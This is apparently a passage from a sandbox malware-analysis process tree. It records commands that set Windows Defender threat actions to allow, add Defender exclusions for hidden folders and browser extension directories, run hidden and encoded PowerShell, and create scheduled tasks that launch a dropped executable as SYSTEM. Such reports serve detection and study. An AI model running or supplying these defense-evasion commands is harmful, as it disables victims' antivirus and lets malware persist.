    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:1448
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:4612
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:3624
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:5500
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:2764
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:3784
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:5208
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:4916
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:5820
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:1684
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:5764
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        
        PID:3760
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:4000
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:2900
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5628
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5548
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5836
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2896
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1936
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2916
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5740
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4800
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5096
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5052
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5416
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2320
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5216
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1728
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5980
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5332
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4820
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6040
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5840
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3040
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2852
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3208
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:980
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5908
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2468
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4704
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3868
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5236
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QtKEgKYoTGTqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QtKEgKYoTGTqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEkGlaTFWGUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEkGlaTFWGUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dlfHiRefefjU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dlfHiRefefjU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hsUwQAlMU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hsUwQAlMU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nivjmgppGaMJQQVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nivjmgppGaMJQQVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QqEAMUespgTHJnVz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\QqEAMUespgTHJnVz\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:5900
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5548
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4336
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:5764
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1728
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5776
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6040
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5828
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3288
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5616
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3448
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:480
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nivjmgppGaMJQQVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1548
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nivjmgppGaMJQQVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3868
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5236
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5684
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4952
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4532
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2308
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6132
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QqEAMUespgTHJnVz /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4452
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QqEAMUespgTHJnVz /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4488
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gXFglHWZD" /SC once /ST 12:00:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:4884
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2320
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gXFglHWZD"
  2⤵
  PID:5980
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5332
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gXFglHWZD"
  2⤵
  PID:3076
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "ZTNkTKukmvvbOMPkn" /SC once /ST 19:37:38 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\AyYkgDF.exe\" 0c /qdotdidNb 385118 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:5992
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5908
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "ZTNkTKukmvvbOMPkn"
  2⤵
  PID:4704
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5648 -s 836
  2⤵
  - Program crash
  PID:2492

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5264

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4544

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5708

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5372

C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe
C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe
1⤵
- Executes dropped EXE
PID:2176

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
